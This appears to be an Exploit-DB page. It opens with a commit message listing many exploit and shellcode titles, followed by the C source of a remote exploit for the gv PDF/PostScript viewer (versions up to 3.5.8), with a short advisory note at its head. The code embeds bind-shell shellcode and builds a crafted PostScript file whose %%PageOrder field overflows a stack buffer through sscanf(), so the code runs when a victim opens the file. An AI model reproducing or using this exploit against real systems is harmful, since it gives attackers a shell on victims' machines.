880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
129 lines
No EOL
5.2 KiB
C
129 lines
No EOL
5.2 KiB
C
// source: https://www.securityfocus.com/bid/5808/info
|
|
|
|
gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.
|
|
|
|
It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.
|
|
|
|
// gv <=3.5.8 remote exploit by priestmaster
|
|
#include <stdio.h>
|
|
|
|
#define STDALIGN 264 // Standard align
|
|
#define SCBUF 800 // Shellcode buffer size
|
|
#define GARBAGE 100 // Garbage for the end
|
|
// of the evil_buffer
|
|
#define NOP 'G' // instead of "\x90"
|
|
|
|
|
|
// Copyright (c) Ramon de Carvalho Valle
|
|
// Bind shell port number 65535
|
|
char bindcode[]= /* 72 bytes */
|
|
"\x31\xdb" /* xorl %ebx,%ebx */
|
|
"\xf7\xe3" /* mull %ebx */
|
|
"\x53" /* pushl %ebx */
|
|
"\x43" /* incl %ebx */
|
|
"\x53" /* pushl %ebx */
|
|
"\x6a\x02" /* pushl $0x02 */
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
|
"\xb0\x66" /* movb $0x66,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\xff\x49\x02" /* decl 0x02(%ecx) */
|
|
"\x6a\x10" /* pushl $0x10 */
|
|
"\x51" /* pushl %ecx */
|
|
"\x50" /* pushl %eax */
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
|
"\x43" /* incl %ebx */
|
|
"\xb0\x66" /* movb $0x66,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x89\x41\x04" /* movl %eax,0x04(%ecx) */
|
|
"\xb3\x04" /* movb $0x04,%bl */
|
|
"\xb0\x66" /* movb $0x66,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x43" /* incl %ebx */
|
|
"\xb0\x66" /* movb $0x66,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x59" /* popl %ecx */
|
|
"\x93" /* xchgl %eax,%ebx */
|
|
"\xb0\x3f" /* movb $0x3f,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x49" /* decl %ecx */
|
|
"\x79\xf9" /* jns <bindsocketshellcode+45> */
|
|
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
|
|
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
|
|
"\x89\xe3" /* movl %esp,%ebx */
|
|
"\x50" /* pushl %eax */
|
|
"\x53" /* pushl %ebx */
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
|
//"\xb0\x0b" /* movb $0x0b,%al */
|
|
// 0b isn't allowed (filter). I use xor %eax, %eax
|
|
// and eleven inc %al. It's the same as \xb0\x0b
|
|
"\x31\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
|
|
"\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
|
|
"\xcd\x80"
|
|
;
|
|
|
|
// How to start the exploit
|
|
void usage(char *prgname)
|
|
{
|
|
printf("\nUsage: %s align retaddr \n\n"
|
|
"align (0 on SUSE 7.0)\n"
|
|
"retaddr (return address (should point to shellcode))\n");
|
|
exit(0);
|
|
}
|
|
|
|
/////////////////////////////////////////
|
|
|
|
main(int argc, char **argv)
|
|
{
|
|
int align; // Align for the buffer
|
|
long retaddr; // return address
|
|
|
|
char buf[BUFSIZ]; // The evil buffer
|
|
char *p; // Pointer to evil buffer
|
|
|
|
if(argc != 3) // 2 Arguments required
|
|
{
|
|
usage(argv[0]);
|
|
}
|
|
|
|
// Get align and return address from parameters
|
|
align = atoi(argv[1]);
|
|
retaddr = strtoul(argv[2], 0 , NULL);
|
|
|
|
/* DEBUG, Shellcode testing
|
|
void (*dsr)();
|
|
(long) dsr = &bindcode;
|
|
dsr(); */
|
|
|
|
// Point to buffer
|
|
p = buf;
|
|
|
|
// Memset the buffer with NOP's
|
|
memset(p, NOP, BUFSIZ);
|
|
|
|
p += STDALIGN+align;
|
|
|
|
// Write return address in buffer (It's a very simple stack overflow).
|
|
*((void **)p) = (void *) retaddr;
|
|
p+=4;
|
|
|
|
// Put shellcode in buffer
|
|
p+=SCBUF-strlen(bindcode)-1;
|
|
memcpy(p, bindcode, strlen(bindcode));
|
|
p += strlen(bindcode);
|
|
|
|
// Add some garbage to end of buffer
|
|
p += GARBAGE;
|
|
|
|
// Null terminate buffer
|
|
*p = 0;
|
|
|
|
// Generate pdf file
|
|
printf("%%!PS-Adobe-3.0\n");
|
|
printf("%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\n");
|
|
printf("%%%%CreationDate: Sat Jun 15 15:30ish\n");
|
|
|
|
// In page order, the stack overflow occur.
|
|
printf("%%%%PageOrder: %s\n", buf);
|
|
printf("%%%%EndComments\n");
|
|
printf("%%%%EOF");
|
|
} |